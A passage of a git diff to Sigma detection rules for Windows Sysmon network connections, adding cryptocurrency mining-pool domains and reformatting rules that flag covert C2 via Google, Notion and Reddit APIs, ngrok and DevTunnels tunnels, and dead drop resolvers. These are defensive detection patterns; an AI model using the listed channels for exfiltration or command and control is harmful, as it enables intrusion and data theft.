hk-upx.miningocean.org + - hk-zephyr.miningocean.org - huadong1-aeon.ppxxmr.com - iwanttoearn.money - jw-js1.ppxxmr.com @@ -151,6 +173,12 @@ detection: - seed6.joulecoin.org - seed7.joulecoin.org - seed8.joulecoin.org + - sg-aipg.miningocean.org + - sg-dynex.miningocean.org + - sg-neurai.miningocean.org + - sg-qrl.miningocean.org + - sg-upx.miningocean.org + - sg-zephyr.miningocean.org - sg.minexmr.com - sheepman.mine.bz - siamining.com @@ -161,7 +189,11 @@ detection: - trtl.cnpool.cc - trtl.pool.mine2gether.com - turtle.miner.rocks + - us-aipg.miningocean.org + - us-dynex.miningocean.org + - us-neurai.miningocean.org - us-west.minexmr.com + - us-zephyr.miningocean.org - usxmrpool.com - viaxmr.com - webservicepag.webhop.net diff --git a/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml b/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml index 6afb67d8b..33a0927a2 100644 --- a/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml +++ b/sigma/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml @@ -1,9 +1,7 @@ title: Potential Dead Drop Resolvers id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7 status: test -description: Detects an executable, which is not an internet browser, making DNS request - to legit popular websites, which were seen to be used as dead drop resolvers in - previous attacks. +description: Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. references: - https://content.fireeye.com/apt-41/rpt-apt41 - https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ @@ -68,6 +66,8 @@ detection: - vimeo.com - wetransfer.com - youtube.com + # Note: Add/Remove browsers/applications that you don't use or those that have custom install locations + # Note: To avoid complex conditions the filters for some apps are generic by name only. A custom tuning is recommended for best results filter_main_chrome: Image: - C:\Program Files\Google\Chrome\Application\chrome.exe @@ -87,11 +87,11 @@ detection: - C:\Program Files (x86)\Internet Explorer\iexplore.exe - C:\Program Files\Internet Explorer\iexplore.exe filter_main_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_main_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -103,9 +103,10 @@ detection: Image|endswith: \safari.exe filter_main_defender: Image|endswith: - - \MsMpEng.exe - - \MsSense.exe + - \MsMpEng.exe # Microsoft Defender executable + - \MsSense.exe # Windows Defender Advanced Threat Protection Service Executable filter_main_prtg: + # Paessler's PRTG Network Monitor Image|endswith: - C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe - C:\Program Files\PRTG Network Monitor\PRTG Probe.exe @@ -202,9 +203,10 @@ detection: DestinationHostname|endswith: - discord.com - cdn.discordapp.com + # filter_optional_qlik: + # Image|endswith: '\Engine.exe' # Process from qlik.com app condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - One might need to exclude other internet browsers found in it's network or other - applications like ones mentioned above from Microsoft Defender. + - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender. level: high ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml b/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml index 4f25f45a1..2ecd9f184 100644 --- a/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_devtunnel_connection.yml @@ -1,18 +1,15 @@ title: Network Connection Initiated To DevTunnels Domain id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 related: - - id: 4b657234-038e-4ad5-997c-4be42340bce4 - type: similar - - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 - type: similar - - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b - type: similar + - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode + type: similar + - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode + type: similar + - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels + type: similar status: experimental -description: 'Detects network connections to Devtunnels domains initiated by a process - on a system. Attackers can abuse that feature to establish a reverse shell or - persistence on a machine. - - ' +description: | + Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2 - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security diff --git a/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml b/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml index a149ff8bf..9dce50381 100644 --- a/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml +++ b/sigma/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml @@ -1,8 +1,7 @@ title: Dfsvc.EXE Network Connection To Uncommon Ports id: 4c5fba4a-9ef6-4f16-823d-606246054741 status: experimental -description: Detects network connections from "dfsvc.exe" used to handled ClickOnce - applications to uncommon ports +description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to uncommon ports references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml b/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml index 0248626ee..842ad6eae 100644 --- a/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml +++ b/sigma/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml @@ -44,17 +44,18 @@ detection: - 172.29. - 172.30. - 172.31. - - 169.254. - - '127.' + - 169.254. # link-local address + - '127.' # loopback address filter_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_msrange: DestinationIp|startswith: + # Subnet: 20.184.0.0/13 - 20.184. - 20.185. - 20.186. @@ -65,13 +66,13 @@ detection: - 20.191. - 23.79. - 51.10. + # Subnet: 51.103.210.0/23 - 51.103. - 51.104. - 51.105. - 52.239. condition: network_connection and (selection and not 1 of filter_*) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces + - Communication to other corporate systems that use IP addresses from public address spaces level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml index c2cd456ab..ae19e9d8b 100644 --- a/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml @@ -1,18 +1,12 @@ title: Excel Network Connections id: 75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84 status: test -description: 'Detects an Excel process that opens suspicious network connections to - non-private IP addresses, and attempts to cover CVE-2021-42292. - - You will likely have to tune this rule for your organization, but it is certainly - something you should look for and could have applications for malicious activity - beyond CVE-2021-42292. - - ' +description: | + Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292. + You will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292. references: - https://corelight.com/blog/detecting-cve-2021-42292 -author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", - Tim Shelton +author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton date: 2021/11/10 modified: 2022/06/27 tags: @@ -53,11 +47,8 @@ detection: - 127.0.0.1 condition: network_connection and (selection and not filter) falsepositives: - - You may have to tune certain domains out that Excel may call out to, such as - microsoft or other business use case domains. - - Office documents commonly have templates that refer to external addresses, like - sharepoint.ourcompany.com may have to be tuned. - - It is highly recommended to baseline your activity and tune out common business - use cases. + - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains. + - Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned. + - It is highly recommended to baseline your activity and tune out common business use cases. level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml b/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml index e648696de..1c5c98e5f 100644 --- a/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml +++ b/sigma/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml @@ -1,8 +1,7 @@ title: Suspicious Non-Browser Network Communication With Google API id: 7e9cf7b6-e827-11ed-a05b-0242ac120003 status: experimental -description: Detects a non-browser process interacting with the Google API which could - indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) +description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) references: - https://github.com/looCiprian/GC2-sheet - https://youtu.be/n2dFlSaBBKo @@ -24,7 +23,7 @@ detection: EventID: 3 Channel: Microsoft-Windows-Sysmon/Operational selection: - DestinationHostname|contains: + DestinationHostname|contains: # Other googleapis should be added as the GC2 tool evolves - oauth2.googleapis.com - sheets.googleapis.com - drive.googleapis.com @@ -49,11 +48,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|contains: :\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: - - :\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - :\Program Files\Microsoft\Edge\Application\msedge.exe - - \WindowsApps\MicrosoftEdge.exe + - Image|contains: :\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: + - :\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - :\Program Files\Microsoft\Edge\Application\msedge.exe + - \WindowsApps\MicrosoftEdge.exe filter_optional_edge_2: Image|contains: - :\Program Files (x86)\Microsoft\EdgeCore\ @@ -79,8 +78,6 @@ detection: Image|endswith: \teams.exe condition: network_connection and (selection and not 1 of filter_optional_*) falsepositives: - - Legitimate applications communicating with the "googleapis.com" endpoints that - are not already in the exclusion list. This is environmental dependent and - requires further testing and tuning. + - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning. level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_hh.yml b/sigma/sysmon/network_connection/net_connection_win_hh.yml index bc5e30b98..94a008547 100644 --- a/sigma/sysmon/network_connection/net_connection_win_hh.yml +++ b/sigma/sysmon/network_connection/net_connection_win_hh.yml @@ -1,11 +1,10 @@ title: HH.EXE Network Connections id: 468a8cea-2920-4909-a593-0cbe1d96674a related: - - id: f57c58b3-ee69-4ef5-9041-455bf39aaa89 - type: derived + - id: f57c58b3-ee69-4ef5-9041-455bf39aaa89 + type: derived status: test -description: Detects network connections made by the "hh.exe" process, which could - indicate the execution/download of remotely hosted .chm files +description: Detects network connections made by the "hh.exe" process, which could indicate the execution/download of remotely hosted .chm files references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md diff --git a/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml b/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml index 943c118bf..366a01210 100644 --- a/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml +++ b/sigma/sysmon/network_connection/net_connection_win_imewdbld.yml @@ -1,11 +1,10 @@ title: Network Connection Initiated By IMEWDBLD.EXE id: 8d7e392e-9b28-49e1-831d-5949c6281228 related: - - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af - type: derived + - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af + type: derived status: test -description: Detects network connections initiated by IMEWDBLD. This might indicate - potential abuse to download arbitrary files via this utility +description: Detects network connections initiated by IMEWDBLD. This might indicate potential abuse to download arbitrary files via this utility references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ @@ -29,5 +28,6 @@ detection: condition: network_connection and selection falsepositives: - Unknown +# Note: Please reduce this to medium if you find legitimate connections level: high ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml b/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml index 73be25b04..01ad5e43a 100644 --- a/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml +++ b/sigma/sysmon/network_connection/net_connection_win_mega_nz.yml @@ -1,8 +1,7 @@ title: Communication To Mega.nz id: fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4 status: test -description: Detects an executable accessing mega.co.nz, which could be a sign of - forbidden file sharing use of data exfiltration by malicious actors +description: Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors references: - https://megatools.megous.com/ - https://www.mandiant.com/resources/russian-targeting-gov-business diff --git a/sigma/sysmon/network_connection/net_connection_win_msiexec.yml b/sigma/sysmon/network_connection/net_connection_win_msiexec.yml index 1e48b1f39..ded7ea57d 100644 --- a/sigma/sysmon/network_connection/net_connection_win_msiexec.yml +++ b/sigma/sysmon/network_connection/net_connection_win_msiexec.yml @@ -1,12 +1,9 @@ title: Msiexec Initiated Connection id: 8e5e38e4-5350-4c0b-895a-e872ce0dd54f status: test -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md diff --git a/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml b/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml index b034284d2..4f1336e49 100644 --- a/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml +++ b/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml @@ -1,8 +1,7 @@ title: Communication To Ngrok Domains id: 18249279-932f-45e2-b37a-8925f2597670 status: test -description: Detects an executable accessing ngrok domains, which could be a sign - of forbidden data exfiltration by malicious actors +description: Detects an executable accessing ngrok domains, which could be a sign of forbidden data exfiltration by malicious actors references: - https://ngrok.com/ - https://ngrok.com/blog-post/new-ngrok-domains diff --git a/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml b/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml index 2ed2b9dd3..d4c8896de 100644 --- a/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml +++ b/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml @@ -1,8 +1,7 @@ title: Communication To Ngrok Tunneling Service id: 1d08ac94-400d-4469-a82f-daee9a908849 status: test -description: Detects an executable accessing an ngrok tunneling endpoint, which could - be a sign of forbidden exfiltration of data exfiltration by malicious actors +description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors references: - https://twitter.com/hakluke/status/1587733971814977537/photo/1 - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent diff --git a/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml b/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml index 223012492..aeabd12e7 100644 --- a/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml +++ b/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Network Connection To Notion API id: 7e9cf7b6-e827-11ed-a05b-15959c120003 status: experimental -description: Detects a non-browser process communicating with the Notion API. This - could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" +description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" references: - https://github.com/mttaggart/OffensiveNotion - https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332 @@ -40,11 +39,11 @@ detection: filter_main_maxthon: Image|endswith: \maxthon.exe filter_main_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_main_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -64,8 +63,6 @@ detection: Image|endswith: \whale.exe condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate applications communicating with the "api.notion.com" endpoint that - are not already in the exclusion list. The desktop and browser applications - do not appear to be using the API by default unless integrations are configured. + - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured. level: low ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml b/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml index 474a5ce9d..0b2ef42a2 100644 --- a/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml +++ b/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml @@ -1,8 +1,7 @@ title: Suspicious Office Outbound Connections id: 3b5ba899-9842-4bc2-acc2-12308498bf42 status: experimental -description: Detects office suit applications communicating to target systems on uncommon - ports +description: Detects office suit applications communicating to target systems on uncommon ports references: - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml index b9685e16b..b45b9448b 100644 --- a/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml @@ -1,8 +1,7 @@ title: PowerShell Initiated Network Connection id: 1f21ec3f-810d-4b0e-8045-322202e22b4b status: experimental -description: Detects a PowerShell process that initiates network connections. Check - for suspicious target ports and target systems. +description: Detects a PowerShell process that initiates network connections. Check for suspicious target ports and target systems. references: - https://www.youtube.com/watch?v=DLtJTxMWZ2o author: Florian Roth (Nextron Systems) @@ -45,18 +44,19 @@ detection: - 172.30. - 172.31. - 127.0.0.1 - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI filter_main_local_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_main_msrange: DestinationIp|startswith: + # Subnet: 20.184.0.0/13 - 20.184. - 20.185. - 20.186. @@ -67,6 +67,7 @@ detection: - 20.191. - 23.79. - 51.10. + # Subnet: 51.103.210.0/23 - 51.103. - 51.104. - 51.105. @@ -75,7 +76,6 @@ detection: falsepositives: - Administrative scripts - Microsoft IP range - - Additional filters are required. Adjust to your environment (e.g. extend filters - with company's ip range') + - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range') level: low ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_python.yml b/sigma/sysmon/network_connection/net_connection_win_python.yml index b434b6837..7d5486342 100644 --- a/sigma/sysmon/network_connection/net_connection_win_python.yml +++ b/sigma/sysmon/network_connection/net_connection_win_python.yml @@ -1,9 +1,7 @@ title: Python Initiated Connection id: bef0bc5a-b9ae-425d-85c6-7b2d705980c6 status: experimental -description: Detects a Python process initiating a network connection. While this - often relates to package installation, it can also indicate a potential malicious - script communicating with a C&C server. +description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python - https://pypi.org/project/scapy/ @@ -25,18 +23,22 @@ detection: Initiated: 'true' Image|contains: python filter_optional_conda: + # Related to anaconda updates. Command example: "conda update conda" + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe - CommandLine|contains|all: + CommandLine|contains|all: - :\ProgramData\Anaconda3\Scripts\conda-script.py - update filter_optional_conda_jupyter_notebook: + # Related to anaconda opening an instance of Jupyter Notebook + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage ParentImage: C:\ProgramData\Anaconda3\python.exe - CommandLine|contains: C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py + CommandLine|contains: C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py filter_main_local_communication: + # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python opening sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 SourceIp: 127.0.0.1 - condition: network_connection and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate python script level: medium diff --git a/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml b/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml index 669f106bb..e4b068208 100644 --- a/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml +++ b/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml @@ -1,8 +1,7 @@ title: Outbound RDP Connections Over Non-Standard Tools id: ed74fe75-7594-4b4b-ae38-e38e3fd2eb23 status: test -description: Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible - lateral movement +description: Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement references: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 author: Markus Neis @@ -28,6 +27,7 @@ detection: - C:\Windows\System32\mstsc.exe - C:\Windows\SysWOW64\mstsc.exe filter_optional_dns: + # https://github.com/SigmaHQ/sigma/pull/2249 Image: C:\Windows\System32\dns.exe SourcePort: 53 Protocol: udp @@ -66,13 +66,12 @@ detection: filter_optional_firefox: Image: C:\Program Files\Mozilla Firefox\firefox.exe filter_optional_null: - Image: null + Image: filter_optional_empty: Image: '' filter_optional_unknown: Image: - condition: network_connection and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Third party RDP tools level: high diff --git a/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml b/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml index ee59bfac0..6eb1d3cb6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml +++ b/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml @@ -1,8 +1,7 @@ title: RDP Over Reverse SSH Tunnel id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4 status: test -description: Detects svchost hosting RDP termsvcs communicating with the loopback - address and on TCP port 3389 +description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 references: - https://twitter.com/SBousseaden/status/1096148422984384514 author: Samir Bousseaden @@ -27,8 +26,8 @@ detection: Initiated: 'true' SourcePort: 3389 selection2: - - DestinationIp|startswith: '127.' - - DestinationIp: ::1 + - DestinationIp|startswith: '127.' + - DestinationIp: ::1 condition: network_connection and (selection and selection2) falsepositives: - Unknown diff --git a/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml b/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml index ee7e39d82..5bff364c8 100644 --- a/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml +++ b/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml @@ -1,8 +1,7 @@ title: RDP to HTTP or HTTPS Target Ports id: b1e5da3b-ca8e-4adf-915c-9921f3d85481 status: test -description: Detects svchost hosting RDP termsvcs communicating to target systems - on TCP port 80 or 443 +description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 references: - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling diff --git a/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml b/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml index 7f7794e45..576c7c059 100644 --- a/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml +++ b/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml @@ -1,8 +1,7 @@ title: Suspicious Non-Browser Network Communication With Reddit API id: d7b09985-95a3-44be-8450-b6eadf49833e status: experimental -description: Detects an a non-browser process interacting with the Reddit API which - could indicate use of a covert C2 such as RedditC2 +description: Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2 references: - https://github.com/kleiton0x00/RedditC2 - https://twitter.com/kleiton0x7e/status/1600567316810551296 @@ -22,7 +21,9 @@ detection: EventID: 3 Channel: Microsoft-Windows-Sysmon/Operational selection: - DestinationHostname|contains: reddit.com + DestinationHostname|contains: reddit.com # Match with Reddit API when you can + # Other browsers or apps known to use reddit should be added + # TODO: Add full paths for default install locations filter_optional_brave: Image|endswith: \brave.exe filter_optional_chrome: @@ -40,11 +41,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -64,7 +65,6 @@ detection: Image|endswith: \whale.exe condition: network_connection and (selection and not 1 of filter_optional_*) falsepositives: - - Legitimate applications communicating with the Reddit API e.g. web browsers - not in the exclusion list, app with an RSS etc. + - Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc. level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml b/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml index 4a3b2a53c..b265f49ac 100644 --- a/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml +++ b/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml @@ -1,8 +1,7 @@ title: Remote PowerShell Session (Network) id: c539afac-c12a-46ed-b1bd-5a5567c9f045 status: test -description: Detects remote PowerShell connections by monitoring network outbound - connections to ports 5985 or 5986 from a non-network service account. +description: Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account. references: - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -25,20 +24,20 @@ detection: DestinationPort: - 5985 - 5986 - Initiated: 'true' + Initiated: 'true' # only matches of the initiating system can be evaluated filter_generic: - - User|contains: - - NETWORK SERVICE - - NETZWERKDIENST - - SERVIZIO DI RETE - - SERVICIO DE RED - - User|contains|all: - - SERVICE R - - SEAU - - SourceIp|startswith: '0:0:' - - Image: - - C:\Program Files\Avast Software\Avast\AvastSvc.exe - - C:\Program Files (x86)\Avast Software\Avast\AvastSvc.exe + - User|contains: # covers many language settings for Network Service. Please expand + - NETWORK SERVICE + - NETZWERKDIENST + - SERVIZIO DI RETE + - SERVICIO DE RED + - User|contains|all: + - SERVICE R + - SEAU + - SourceIp|startswith: '0:0:' + - Image: + - C:\Program Files\Avast Software\Avast\AvastSvc.exe + - C:\Program Files (x86)\Avast Software\Avast\AvastSvc.exe filter_localhost: SourceIp: - ::1 diff --git a/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml b/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml index caa482149..6623cb057 100644 --- a/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml +++ 